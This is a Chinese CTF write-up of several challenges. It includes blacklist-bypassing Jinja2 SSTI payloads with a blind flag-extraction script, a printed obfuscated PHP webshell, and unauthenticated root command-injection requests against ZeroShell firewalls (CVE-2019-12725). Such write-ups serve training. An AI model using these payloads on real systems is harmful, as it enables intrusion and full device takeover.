
第二届国赛铁三wp

第二届国赛

缺东西去我blog找👇
第二届长城杯/铁三 | DDL'S BLOG
web

Safe_Proxy

题目源码（Flask 应用 + 前置的"安全反代"，完整代码如下）
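from flask import Flask, request, render_template_string
import socket
import threading
import html

app = Flask(__name__)


@app.route('/', methods=["GET"])
def source():
    """GET /: return this file's own source, HTML-escaped, inside <pre>.

    The body is re-read from ``__file__`` on every request, so anything that
    overwrites app.py on disk (see the app.py-overwrite payloads later on this
    page) is served back on the next GET without restarting the process.
    """
    with open(__file__, 'r', encoding='utf-8') as f:
        return '<pre>' + html.escape(f.read()) + '</pre>'


@app.route('/', methods=["POST"])
def template():
    """POST /: render the ``code`` form field as a Jinja2 template -- the SSTI sink.

    The "filter" is a fixed-substring blacklist.  It is bypassed by splitting
    tokens across adjacent string literals (``'_''_class_''_'``, ``'po''pen'``),
    reaching attributes through ``|attr(...)`` instead of ``.``/``[]``, and by
    building names with ``[::-1]`` or ``+`` -- exactly what the payloads on this
    page do.  The rendered result is only print()ed on the server and the
    response is always ``ok``/``error``, so exploitation is blind: time-based
    (``sleep``) or by writing into a file the GET handler serves back.
    """
    # "" default: a POST without ``code`` used to raise TypeError on
    # ``black in None`` and surface as a 500 instead of a normal reply.
    template_code = request.form.get("code", "")
    # Substring blacklist (the original's "security filter"); see the docstring
    # for why it is not sufficient.
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    result = render_template_string(template_code)  # user input used as template source
    print(result)
    return 'ok' if result is not None else 'error'


class HTTPProxyHandler:
    """Raw TCP relay in front of the Flask app that rewrites every response.

    Whatever the upstream returns -- status line, headers and body -- is sent
    back as the *body* of a synthetic ``HTTP/1.1 200 OK`` with a fresh
    Content-Length and Content-Type.  That is what the author's "secure reverse
    proxy, prevents attacks on the response headers" comment refers to: the
    app's own headers never reach the client.  Status codes are lost as well
    (everything becomes 200).
    """

    CHUNK = 4096

    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port

    def _read_request(self, client_socket):
        """Read the client's request bytes.

        Framing is heuristic: reading stops at the first recv() that returns
        fewer than CHUNK bytes (or EOF).  There is no Content-Length parsing,
        so a body that lands exactly on a 4096-byte boundary, or a client that
        sends in slow pieces, is mis-framed.  Kept as in the original because
        the challenge relies on this exact behaviour.
        """
        request_data = b""
        while True:
            chunk = client_socket.recv(self.CHUNK)
            request_data += chunk
            if len(chunk) < self.CHUNK:
                break
        return request_data

    def _forward(self, request_data):
        """Send the raw request to the target and read until upstream closes."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
            proxy_socket.connect((self.target_host, self.target_port))
            proxy_socket.sendall(request_data)
            parts = []
            while True:
                chunk = proxy_socket.recv(self.CHUNK)
                if not chunk:
                    break
                parts.append(chunk)
        return b"".join(parts)

    @staticmethod
    def _wrap(response_body):
        """Build the synthetic 200 response carrying *response_body* verbatim."""
        return (
            b"HTTP/1.1 200 OK\r\n"
            b"Content-Length: " + str(len(response_body)).encode() + b"\r\n"
            b"Content-Type: text/html; charset=utf-8\r\n"
            b"\r\n" + response_body
        )

    def handle_request(self, client_socket):
        """Serve one client connection, then close it (also on error)."""
        try:
            request_data = self._read_request(client_socket)
            if not request_data:
                return
            upstream = self._forward(request_data)
            # The original computed header_end = rfind(b"\r\n\r\n") and then
            # used the whole upstream response in both branches; the dead
            # branch is dropped, the behaviour (upstream headers forwarded
            # inside the body) is kept.
            client_socket.sendall(self._wrap(upstream))
        except Exception as e:
            print(f"Proxy Error: {e}")
        finally:
            client_socket.close()


def start_proxy_server(host, port, target_host, target_port):
    """Accept connections on (host, port) and hand each one to a daemon thread."""
    proxy_handler = HTTPProxyHandler(target_host, target_port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(100)
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")
    try:
        while True:
            client_socket, addr = server_socket.accept()
            print(f"Connection from {addr}")
            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
            thread.daemon = True
            thread.start()
    except KeyboardInterrupt:
        print("Shutting down proxy server...")
    finally:
        server_socket.close()


def run_flask_app():
    """Run the app on loopback only; the proxy on 0.0.0.0:5001 is the public face."""
    app.run(debug=False, host='127.0.0.1', port=5000)


if __name__ == "__main__":
    proxy_host = "0.0.0.0"
    proxy_port = 5001
    target_host = "127.0.0.1"
    target_port = 5000
    # Original comment: "secure reverse proxy, prevents attacks on the response
    # headers" -- see HTTPProxyHandler for what it actually does.
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
    proxy_thread.daemon = True
    proxy_thread.start()
    print("Starting Flask app...")
    run_flask_app()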
法一盲注

附上脚本
import requests
import base64
import string
import time
from urllib.parse import urlencode

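# --- blind (time-based) SSTI extraction of /flag ------------------------------

URL = "http://8.147.128.179:22740"   # challenge instance at the time; adjust

# Gadget chain: ().__class__.__mro__[1] is `object`; its subclass at index 133
# had an __init__ whose __globals__ exposed popen on this instance.  The index
# depends on the interpreter build -- re-check it on the live target.  Every
# blacklisted token is split across adjacent string literals ('_''_', 'po''pen')
# and attributes are reached via |attr(), which the substring filter cannot see.
PAYLOAD_PREFIX = (
    "{{()|attr('_''_class_''_')|attr('_''_mro_''_')|attr('_''_getitem_''_')(1)"
    "|attr('_''_subclasses_''_')()|attr('_''_getitem_''_')(133)"
    "|attr('_''_init_''_')|attr('_''_globals_''_')|attr('_''_getitem_''_')('po''pen')('"
)
PAYLOAD_SUFFIX = "')|attr('re''ad')()}}"

# Alphabet tried at each position.  string.printable (used originally) also
# contains quotes, backslash, `$`, backtick and whitespace, which break the
# `[ "$(...)" = "x" ]` shell test or hit the '\r'/'\n' blacklist and yield
# bogus timings, so it is narrowed to what a flag can plausibly contain.
CHARSET = string.ascii_letters + string.digits + "{}-_@!?."

SLEEP_SECONDS = 2          # delay the oracle introduces on a hit
THRESHOLD = 1.5            # round-trip above this counts as a hit
MAX_LEN = 50               # positions 1..MAX_LEN-1, as in the original range(1, 50)


def build_payload(position, guess):
    """Return the template that sleeps iff byte `position` (1-based) of /flag equals `guess`.

    Shell side: `[ "$(head -c N /flag | tail -c 1)" = "c" ] && sleep 2`.
    """
    probe = ('[ "$(head -c ' + str(position) + ' /flag | tail -c 1)" = "'
             + guess + '" ] && sleep ' + str(SLEEP_SECONDS))
    return PAYLOAD_PREFIX + probe + PAYLOAD_SUFFIX


def probe_once(url, payload):
    """POST `payload` as the `code` form field; return the round-trip in seconds.

    requests form-encodes the dict itself, so the template is passed raw.  The
    original ran it through urllib.parse.urlencode() first, which raises
    TypeError for a str argument (and would double-encode if it did not).
    The timeout keeps a dead target from hanging the loop forever.
    """
    started = time.time()
    requests.post(url, data={"code": payload}, timeout=SLEEP_SECONDS * 5)
    return time.time() - started


def extract_flag(url=URL, max_len=MAX_LEN):
    """Recover /flag one byte at a time through the timing oracle.

    Stops at the first position where no candidate triggers the delay (end of
    file, or the gadget/filter stopped working) instead of spinning through
    every remaining position as the original did.
    """
    flag = ""
    for position in range(1, max_len):
        for guess in CHARSET:
            if probe_once(url, build_payload(position, guess)) > THRESHOLD:
                flag += guess
                print(flag)
                break
        else:
            break
    return flag


# Connectivity check kept from the original notes: a bare `sleep 10` with no
# comparison.  If this POST takes ~10 s the chain and the bypass work.
CONNECTIVITY_CHECK = PAYLOAD_PREFIX + "sleep 10" + PAYLOAD_SUFFIX


if __name__ == "__main__":
    print(extract_flag())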
#if head -c /flag ) 法二覆盖

本地调试时把源码里的 `return 'ok' if result is not None else 'error'` 改成 `return 'ok' + result if result is not None else 'error'`，让渲染结果回显，然后用焚靖（Fenjing）打本地生成绕过黑名单的 payload
覆盖 app.py 路由：GET / 的 source() 每次请求都重新读取 `__file__`（app.py）并回显，所以把命令输出重定向进 app.py，再 GET / 就能读到结果；进程里已加载的路由不受影响（debug=False，没有自动重载）。
ls / >app.py
{%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set hz='so'[::-1]%}{{cycler.next[gl][bu][im](hz)['p''open']('ls+/>app.py').read()}}
（论坛渲染把 `*` 当成斜体、把 `[gl][bu][im]` 当成 BBCode 吞掉了，这里按 Fenjing 的常规输出还原；`+` 是表单编码里的空格，服务端收到的是 `ls / >app.py`）
cat /flag >app.py
{%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set hz='so'[::-1]%}{{cycler.next[gl][bu][im](hz)['p''open']('cat+/flag>app.py').read()}}
（同样经论坛渲染吞掉了 `*` 和 `[gl][bu][im]`，此处已还原；`+` 即空格，实际执行 `cat /flag >app.py`，之后 GET / 即可看到 flag）
hello_web

这个当初没做出来：服务端把 `../` 替换成了空字符串（且只替换一遍，不递归），所以用 `..././` 在替换后会还原成 `../`，即可完成目录穿越。
tips文件是一个phpinfo
hackme.php 里面是一句话木马（经过多层混淆，见下）
<?php
// Obfuscated webshell recovered from hackme.php.  Every function name below is
// assembled from single characters of $lapUCm using the pre-PHP-8 `$str{n}`
// offset syntax (removed in PHP 8.0), so this stage only parses on PHP 5/7.
highlight_file(__FILE__);
// Two 52-char alphabets.  Not used at this level; stage 2 re-declares them as
// the first 104 chars of $uWcdaA and uses them as the strtr() table
// ($OlWYMv -> $lJbGIY) for the inner payload.
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";
$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";
// Character pool; decodes to "n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j".
$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};                                          // "base"
$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};                            // "strtr"
$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};                    // "substr"
$rVkKjU=$lapUCm{7}.$lapUCm{13};                                                                 // "52" = alphabet length
$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30}; // "base64_decode"
// Stage 2: the base64 blob is
//   $uWcdaA="<alphabet1><alphabet2><payload>";
//   eval('?>'.base64_decode(strtr(substr($uWcdaA,104), substr($uWcdaA,52,52), substr($uWcdaA,0,52))));
// i.e. char-for-char substitution then base64 -- which yields a plain
// `<?php @eval($_POST['cmd_66.99']); ?>` backdoor (worked out by hand from the
// tables above; confirm by swapping this eval() for echo, as the writeup does).
eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
?> eval换成echo输出出来看看
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMDQwMTkzOS5wbmcmcG9zX2lkPTYwMjdwaGxj
然后再修改一下让他输出
<?php highlight_file(__FILE__);
// Debug copy of hackme.php with the decoded stage appended so it can be read.
// Function names are built from single characters of $lapUCm via the
// pre-PHP-8 `$str{n}` offset syntax (removed in PHP 8.0) -- run it on PHP 7.
// Substitution alphabets: strtr() maps each char of $OlWYMv to the char at the
// same index of $lJbGIY.  Declared here but only consumed through $uWcdaA below.
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";
$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";
// Character pool "n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j".
$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
// $YwzIst = "base", $OxirhK = "strtr"
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};
// $YpAUWC = "substr"
$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};
// $rVkKjU = "52" (alphabet length); $YwzIst becomes "base64_decode"
$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};
// Still executes stage 2 (which eval()s the final backdoor).  Harmless
// locally without the POST parameter, but when analysing an untrusted sample
// comment this out and use the echo line below instead.
eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
// Prints stage 2 instead of running it:
//   $uWcdaA="...";eval('?>'.$YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU))));
#echo($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
echo "\n";
// $uWcdaA = $lJbGIY . $OlWYMv . <52+ char payload>, copied out of the decoded stage 2.
$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";
// base64_decode(strtr(payload, from=alphabet2, to=alphabet1)) -- the final
// stage, a one-line `<?php @eval($_POST['cmd_66.99']); ?>` (worked out by hand
// from the tables; verify against this echo).  The browser treats the echoed
// `<?php ... ?>` as a tag, hence "看不到" -- read it from view-source.
echo $YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU)));
?> 看不到,看源代码
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMTExNTQyMS5wbmcmcG9zX2lkPXAzTG9BcVF6
解出一句话木马（`@eval($_POST[...])` 形式，POST 参数名见上面 echo 出来的结果）后用蚁剑连接，再走 disable_functions 绕过来执行命令
http://eci-2zed8l51f9k8f9ptch3w.cloudeci1.ichunqiu.com/index.php?file=..././hackme.php ##
zeroshell

标题内容:
小路是一名实习生，接替公司前任网管的工作，一天发现公司网络出口出现了异常通信，现需要通过回溯出口流量对异常点位（防火墙）进行定位，并确定异常的设备，然后进行深度取证检查（需要获取 root 权限）。现在需要你从网络攻击数据包中找出漏洞攻击的会话，分析会话编写 exp 或进行数据包重放以获取防火墙设备管理员权限，查找防火墙设备上安装的木马，然后分析木马外联地址和通信密钥以及木马启动项位置。
1

.从数据包中找出攻击者利用漏洞开展攻击的会话（攻击者执行了一条命令），写出该会话中设置的 flag，结果提交形式：flag{xxxxxxxxx}
（本题附件见于提前下载的加密附件2e9c01da1d333cb8840968689ed3bc57.7z，解压密码为11b0526b-9cfb-4ac4-8a75-10ad9097b7ce）
搜base64的flag出包,然后解码referer
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNjIxMTMwNTMzNC5wbmcmcG9zX2lkPTlXZW55emw1
2

通过漏洞利用获取设备控制权限，然后查找设备上的 flag 文件，提取 flag 文件内容，结果提交形式：flag{xxxxxxxxxx}
这是个已公开的 CVE（ZeroShell kerbynet 的 x509type 参数命令注入，应为 CVE-2019-12725：`%0A` 换行跳出引号后内容被直接拼进 shell 命令，无需认证）。第一种方法是在网上找现成 PoC：
https://developer.aliyun.com/article/1334090 /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMjQ1ODQ0Mi5wbmcmcG9zX2lkPTRQMmJrOWlm
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNTE0MTYzNjgxMC5wbmcmcG9zX2lkPVJPejRkeUlm
第二种是看流量包，直接复用流量包里面攻击者用过的那条请求（就是上边第一问的这个）
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNjIxMTYwNDA4NS5wbmcmcG9zX2lkPVE4Y1JUQ2xk
GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec='ps%20-ef'%0A' HTTP/1.1\r\n
（这条请求里 `%0A`（换行）跳出了 x509type 的引号，随后 `/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='ps -ef'` 借 sudo + tar 的 checkpoint 动作以 root 执行任意命令；把 `ps -ef` 换成别的命令即可。）
3

flag{202.115.89.103}
找出受控机防火墙设备中驻留木马的外联域名或 IP 地址，结果提交形式：flag{xxxx}，如 flag{www.abc.com} 或 flag{16.122.33.44}
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMzIzNjgyMy5wbmcmcG9zX2lkPUxqcjdrMEJP
4

flag为.nginx
请写出木马进程执行的本体文件的名称，结果提交形式：flag{xxxxx}，仅写文件名不加路径
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzMzMwODQ3MC5wbmcmcG9zX2lkPURmcURzaUpz
ls -l /proc/10565/exe 来查找运行文件;找到为.nginx
它还是个隐藏文件（以 . 开头，普通 ls 看不到）；比赛结束之后复现时可能已经没有上面↑那个外连的进程了 https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzMzgwMTAzNy5wbmcmcG9zX2lkPUtEeGhUUVRl
5

请提取驻留的木马本体文件,通过逆向分析找出木马样本通讯使用的加密密钥flag{11223344qweasdzxc}
直接 xxd 看十六进制就能找到明文存放的密钥字符串
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzNDE1NzkyMi5wbmcmcG9zX2lkPWR1TXgzSW5n
下载方法2

没试过,听说可以
wget "http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27cat%20/tmp/.nginx%27%0A%27"
6

请写出驻留木马的启动项，注意写出启动文件的完整路径。结果提交形式：flag{xxxx}，如 flag{/a/b/c}
在 shell 中反复查找文件，搜索内容包含 ".nginx" 字符串的文件（例如 grep -r），最终在 /var 目录下找到
flag{/var/register/system/startup/scripts/nat/File}
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzNDUyNjg0NC5wbmcmcG9zX2lkPUZyRk4weHFi
WinFT

某单位网管日常巡检中发现某员工电脑（IP:192.168.116.123）存在异常外连及数据传输行为，随后立刻对该电脑进行断网处置，并启动网络安全应急预案进行排查。
（本题附件见于提前下载的加密附件82f13fdc9f7078ba29c4a6dcc65d8859.7z，解压密码为3604e2f3-585a-4972-a867-3a9cc8d34c1d）
_1

受控机木马的回连域名及ip及端口是(示例:flag{xxx.com:127.0.0.1:2333})
法一

文档里有个病毒 exe 文件；或者在火绒剑的「网络」页里也可以看到这个 exe 的外连。
点开桌面的火绒剑，再点击「网络」可以看到远程地址；把文件丢到微步云沙箱 https://s.threatbook.com/ 也可以找到回连地址
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNTE1Mzc1MTkzNS5wbmcmcG9zX2lkPWhXVTJZa1pO
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNTE1NDY0OTI0Mi5wbmcmcG9zX2lkPXU4OVh2Wk5H
flag{miscsecure.com:192.168.116.130:443}
法二

分析里面的数据包
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MDAyMTg0NC5wbmcmcG9zX2lkPWh4MU5aOWN2
_2

受控机启动项中潜伏flag是
按 Win + R 打开运行对话框。
输入 taskschd.msc,然后按回车键。
内里就这一个东西
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MTAzNTg5MC5wbmcmcG9zX2lkPWRZT0U5U3c1
f^l^a^g^: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 https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MTMzNjc0Ny5wbmcmcG9zX2lkPVV6Z2ZyNHBM
_3

受控机中驻留的flag是

_4

受控源头潜伏的flag是
_5

分析流量，从中提取出的压缩包里得到答案
将流量包放入同流合污,foremost,出来有压缩包
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MzUyOTg2NC5wbmcmcG9zX2lkPWJXV3dFcERh
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MzkxOTI4NC5wbmcmcG9zX2lkPVIyWVpDRkh2
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MzkxMDE3Ni5wbmcmcG9zX2lkPUlSNXFIcjUy
